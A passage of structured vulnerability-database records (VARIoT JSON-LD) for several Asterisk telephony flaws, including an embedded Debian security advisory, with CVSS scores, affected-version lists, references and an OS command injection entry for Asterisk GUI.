"id": "JVNDB-2023-024446"
},
{
"date": "2024-01-05T14:31:02",
"db": "PACKETSTORM",
"id": "176383"
},
{
"date": "2023-12-14T20:15:52.927000",
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-31T06:13:00",
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"date": "2023-12-29T00:15:50.043000",
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Vulnerabilities related to race conditions in products from multiple vendors such as",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
}
],
"trust": 0.8
}
}
VAR-202312-1059
Vulnerability from variot - Updated: 2024-01-18 22:29Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa. Digium of Asterisk Classic buffer overflow vulnerabilities exist in products from multiple vendors.Information is tampered with and service operation is interrupted (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq
Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033
Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.
CVE-2023-38703
PJSIP is a free and open source multimedia communication library written in
C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
higher level media transport which is stacked upon a lower level media
transport such as UDP and ICE. Currently a higher level transport is not
synchronized with its lower level transport that may introduce a
use-after-free issue. This vulnerability affects applications that have
SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
transport other than UDP. This vulnerability’s impact may range from
unexpected application termination to control flow hijack/memory
corruption.
CVE-2023-49294
It is possible to read any arbitrary file even when the `live_dangerously`
option is not enabled.
CVE-2023-49786
Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP.
For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.
We recommend that you upgrade your asterisk packages.
For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202312-1059",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "19.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "18.9"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "16.8.0"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 1.0,
"vendor": "digium",
"version": "20.5.0"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 1.0,
"vendor": "digium",
"version": "18.20.0"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "21.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "13.13.0"
},
{
"model": "asterisk",
"scope": null,
"trust": 0.8,
"vendor": "digium",
"version": null
},
{
"model": "certified asterisk",
"scope": null,
"trust": 0.8,
"vendor": "sangoma",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "20.5.0",
"versionStartIncluding": "19.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "18.20.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Debian",
"sources": [
{
"db": "PACKETSTORM",
"id": "176383"
}
],
"trust": 0.1
},
"cve": "CVE-2023-37457",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 4.2,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.2,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2023-37457",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-37457",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2023-37457",
"trust": 1.0,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa. Digium of Asterisk Classic buffer overflow vulnerabilities exist in products from multiple vendors.Information is tampered with and service operation is interrupted (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1 security@debian.org\nhttps://www.debian.org/security/ Markus Koschany\nJanuary 04, 2024 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nCVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-38703\n\n PJSIP is a free and open source multimedia communication library written in\n C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n higher level media transport which is stacked upon a lower level media\n transport such as UDP and ICE. Currently a higher level transport is not\n synchronized with its lower level transport that may introduce a\n use-after-free issue. This vulnerability affects applications that have\n SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n transport other than UDP. This vulnerability\u2019s impact may range from\n unexpected application termination to control flow hijack/memory\n corruption. \n\nCVE-2023-49294\n\n It is possible to read any arbitrary file even when the `live_dangerously`\n option is not enabled. \n\nCVE-2023-49786\n\n Asterisk is susceptible to a DoS due to a race condition in the hello\n handshake phase of the DTLS protocol when handling DTLS-SRTP for media\n setup. This attack can be done continuously, thus denying new DTLS-SRTP\n encrypted calls during the attack. Abuse of this vulnerability may lead to\n a massive Denial of Service on vulnerable Asterisk servers for calls that\n rely on DTLS-SRTP. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-37457"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "PACKETSTORM",
"id": "176383"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-37457",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2023-020247",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "176383",
"trust": 0.1
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"id": "VAR-202312-1059",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-01-18T22:29:19.418000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-98rc-4j27-74hh"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/asterisk"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"date": "2024-01-05T14:31:02",
"db": "PACKETSTORM",
"id": "176383"
},
{
"date": "2023-12-14T20:15:52.260000",
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-16T02:56:00",
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"date": "2023-12-29T00:15:49.697000",
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Classic buffer overflow vulnerabilities in products from multiple vendors",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
}
],
"trust": 0.8
}
}
VAR-201709-0712
Vulnerability from variot - Updated: 2023-12-18 13:24An Improper Neutralization of Special Elements used in an OS Command issue was discovered in Digium Asterisk GUI 2.1.0 and prior. An OS command injection vulnerability has been identified that may allow the execution of arbitrary code on the system through the inclusion of OS commands in the URL request of the program. The Asterisk GUI is a framework for configuring graphical user interfaces. Digium Asterisk GUI is prone to an OS command-injection vulnerability because it fails to properly sanitize user-supplied input. Successfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Asterisk GUI 2.1.0 and prior versions are vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0712",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk gui",
"scope": "lte",
"trust": 1.8,
"vendor": "digium",
"version": "2.1.0"
},
{
"model": "asterisk gui",
"scope": "lte",
"trust": 0.6,
"vendor": "digium",
"version": "\u003c=2.1.0"
},
{
"model": "asterisk gui",
"scope": "eq",
"trust": 0.6,
"vendor": "digium",
"version": "2.1.0"
},
{
"model": "asterisk gui",
"scope": "eq",
"trust": 0.3,
"vendor": "digium",
"version": "2.1"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "asterisk gui",
"version": "*"
}
],
"sources": [
{
"db": "IVD",
"id": "a65c0f37-5815-4893-b0c3-0c14c3b1b227"
},
{
"db": "CNVD",
"id": "CNVD-2017-27939"
},
{
"db": "BID",
"id": "100950"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008554"
},
{
"db": "NVD",
"id": "CVE-2017-14001"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1088"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk_gui:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "2.1.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14001"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Davy Douhine of RandoriSec",
"sources": [
{
"db": "BID",
"id": "100950"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1088"
}
],
"trust": 0.9
},
"cve": "CVE-2017-14001",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
